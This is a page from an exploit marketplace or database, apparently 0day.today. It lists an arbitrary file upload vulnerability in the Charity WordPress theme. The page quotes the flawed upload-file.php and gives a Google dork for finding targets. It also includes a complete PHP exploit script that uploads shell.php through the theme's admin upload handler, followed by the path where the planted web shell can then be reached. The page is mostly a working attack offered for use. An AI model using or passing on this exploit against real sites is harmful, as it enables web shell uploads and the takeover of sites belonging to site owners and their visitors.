[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Wordpress Theme Charity Arbitrary File Upload Vulnerability

Author
terrorist
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-23258
Category
web applications
Date add
09-02-2015
Platform
php
#########################################################
# Exploit Title: Wordpress Theme Charity Arbitrary File Upload Vulnerability
# Source: https://github.com/UpThemes/Charity-Theme
# Author: terrorist
# Email: mrinjector17@gmail.com
# Team: GHC - Georgian Hacking Community
# Category: webapps/php
# Google dork: inurl:wp-content/themes/charity
#########################################################
 
# Vulnerable upload-file.php
<?php
//Upload Security
$upload_security = md5($_SERVER['SERVER_ADDR']);
$uploaddir = base64_decode( $_REQUEST['upload_path'] ) . "/";
if( $_FILES[$upload_security] ):
	$file = $_FILES[$upload_security];
	$file = $uploaddir . strtolower(str_replace('__', '_', str_replace('#', '_', str_replace(' ', '_', basename($file['name'])))));
	
		if (move_uploaded_file( $_FILES[$upload_security]['tmp_name'], $file)):
			if(chmod($file,0777)):
			    echo "success"; 
			else:
				echo "error".$_FILES[$upload_security]['tmp_name'];
			endif;
		else:
		    echo "error".$_FILES[$upload_security]['tmp_name'];
		endif;
endif;
?>

# Exploit
<?php
$uploadfile="shell.php";
$target = "http://target.com";
$domain = explode("/", $target);
$server_addr = gethostbyname($domain[2]);
$ch = curl_init($target."/wp-content/themes/charity/admin/upload-file.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_VERBOSE, false);
curl_setopt($ch, CURLOPT_POSTFIELDS,array(md5($server_addr)=>"@$uploadfile",'upload_path'=>base64_encode('.')));
curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

# File path: http://target/wp-content/themes/charity/admin/shell.php

#  0day.today [2024-11-16]  #